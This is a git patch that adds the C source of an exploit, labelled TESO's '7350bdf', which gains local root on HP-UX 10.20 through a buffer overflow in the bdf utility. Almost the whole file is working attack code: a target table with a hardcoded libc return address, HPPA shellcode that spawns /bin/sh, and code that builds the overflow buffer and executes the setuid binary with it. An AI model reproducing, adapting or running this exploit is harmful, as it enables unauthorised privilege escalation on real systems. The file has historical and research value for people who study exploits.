From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 exploits/7350bdf/7350bdf.c | 201 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 201 insertions(+)
 create mode 100644 exploits/7350bdf/7350bdf.c

(limited to 'exploits/7350bdf')

diff --git a/exploits/7350bdf/7350bdf.c b/exploits/7350bdf/7350bdf.c
new file mode 100644
index 0000000..144214b
--- /dev/null
+++ b/exploits/7350bdf/7350bdf.c
@@ -0,0 +1,201 @@
+/* 7350bdf - hppa/hpux bdf local root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za, PacketStorm Security and SecuriTeam websites and any public
+ * exploit archive.
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * found by scut 2001/08/21, yah yah i know its old
+ * kudos to caddis for enlightning me about quadrants
+ *
+ */
+
+#define	VERSION "0.0.1"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+
+void usage (char *progname);
+
+
+typedef struct {
+	char *		desc;
+	int		bsize;	/* overall buffer size */
+	int		align;
+
+	/* the return address has to
+	 *
+	 *    a) lie within the shared library quadrant (within libc)
+	 *    b) point to some code snippet that looks like this:
+	 *
+	 *       0xc0108ea8:     ldw -18(sr0,sp),rp
+	 *       0xc0108eac:     ldsid (sr0,rp),r1
+	 *       0xc0108eb0:     mtsp r1,sr0
+	 *       0xc0108eb4:     be,n 0(sr0,rp)
+	 *
+	 *       this sets the space id accordingly, so we can return into
+	 *       the stack
+	 */
+	int		ret_pos;
+	unsigned int	ret_addr;
+
+	/* this is the address our code lies at, and the position where to
+	 * put it
+	 */
+	int		code_pos;
+	unsigned int	code_addr;
+
+	/* at least HP-UX 10.20 needs a sane value at a place, which i
+	 * happened to call r15_val, since it is passed through %r15
+	 */
+	int		r15_pos;
+	unsigned int	r15_val;
+} t_elem;
+
+t_elem	targets[] = {
+	/* tested on: HP-UX calina B.10.20 A 9000/735 -sc */
+	{ "HP-UX 10.20", 1200, 3, 1196, 0xc0108ea8,
+		1192, 0x7b03a220, 1040, 0x7b03a4f8 },
+
+	{ NULL, 0, 0, 0, 0, 0 },
+};
+
+
+/* LSD shellcode, thanks buddies */
+unsigned char nop[] =
+	"\x0b\x39\x02\x99";     /* xor     %r25,%r25,%r25         */
+
+unsigned char shellcode[] =
+	"\x0b\x5a\x02\x9a"	/* xor     %r26,%r26,%r26         */
+	"\x0b\x39\x02\x99"	/* xor     %r25,%r25,%r25         */
+	"\x0b\x18\x02\x98"	/* xor     %r24,%r24,%r24         */
+	"\x20\x20\x08\x01"	/* ldil    L%0xc0000004,%r1       */
+	"\xe4\x20\xe0\x08"	/* ble     R%0xc0000004(%sr7,%r1) */
+	"\xb4\x16\x70\xfc"	/* addi,>  0x7e,%r0,%r22          */
+
+	"\xeb\x5f\x1f\xfd"	/* bl      <shellcode+4>,%r26     */
+	"\x0b\x39\x02\x99"	/* xor     %r25,%r25,%r25         */
+	"\xb7\x5a\x40\x22"	/* addi,<  0x11,%r26,%r26         */
+	"\x0f\x40\x12\x0e"	/* stbs    %r0,7(%r26)            */
+	"\x20\x20\x08\x01"	/* ldil    L%0xc0000004,%r1       */
+	"\xe4\x20\xe0\x08"	/* ble     R%0xc0000004(%sr7,%r1) */
+	"\xb4\x16\x70\x16"	/* addi,>  0xb,%r0,%r22           */
+	"/bin/shA";
+
+
+void
+usage (char *progname)
+{
+	fprintf (stderr, "usage: %s [-t <num>]\n\n", progname);
+	fprintf (stderr, "-t num\tchoose target (0 for list)\n\n");
+
+	exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char *argv[])
+{
+	char		c;
+	int		b_walker;
+	unsigned int *	iptr;
+	unsigned char	buf[2048];
+
+	char *		n_argv[3];
+	char *		n_env[1];
+
+	int		tgt_num = -1;
+	t_elem *	tgt;
+
+
+	printf ("7350bdf - hppa/hpux bdf local root exploit\n"
+		"-scut\n\n");
+
+	while ((c = getopt (argc, argv, "t:")) != EOF) {
+		switch (c) {
+		case 't':
+			tgt_num = atoi (optarg);
+			break;
+		default:
+			usage (argv[0]);
+			break;
+		}
+	}
+
+	if (tgt_num < 0)
+		usage (argv[0]);
+
+	if (tgt_num == 0) {
+		printf ("num . description\n");
+		printf ("----+--------------------------------\n");
+
+		for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
+			printf ("%3d | %s\n", tgt_num + 1,
+				targets[tgt_num].desc);
+
+		printf ("    '\n");
+
+		exit (EXIT_SUCCESS);
+	}
+
+	if (tgt_num >= (sizeof (targets) / sizeof (t_elem)))
+		usage (argv[0]);
+
+	tgt = &targets[tgt_num - 1];
+	printf ("using: %s\n", tgt->desc);
+
+	memset (buf, '\0', sizeof (buf));
+
+	/* set nops */
+	if (tgt->align != 0)
+		memset (buf, 'A', tgt->align);
+
+	for (b_walker = tgt->align ; b_walker < (tgt->bsize - tgt->align) ;
+		b_walker += 4)
+	{
+		buf[b_walker] = nop[0];
+		buf[b_walker + 1] = nop[1];
+		buf[b_walker + 2] = nop[2];
+		buf[b_walker + 3] = nop[3];
+	}
+
+	if (tgt->r15_pos != 0) {
+		iptr = (unsigned int *) &buf[tgt->r15_pos];
+
+		*iptr = tgt->r15_val;	/* sane %r15 */
+	}
+
+	iptr = (unsigned int *) &buf[tgt->code_pos];
+	*iptr = tgt->code_addr;	/* real retaddr */
+
+	iptr = (unsigned int *) &buf[tgt->ret_pos];
+	*iptr = tgt->ret_addr;	/* yay! */
+
+	/* we assume the buffer is 1024 bytes long */
+	memcpy (&buf[1023] - strlen (shellcode), shellcode,
+		strlen (shellcode));
+
+	buf[tgt->bsize] = '\0';
+
+	n_argv[0] = "/usr/bin/bdf";
+	n_argv[1] = buf;
+	n_env[0] = NULL;
+
+	execve (n_argv[0], n_argv, n_env);
+
+	exit (EXIT_FAILURE);
+}
+
+
-- 
cgit v1.3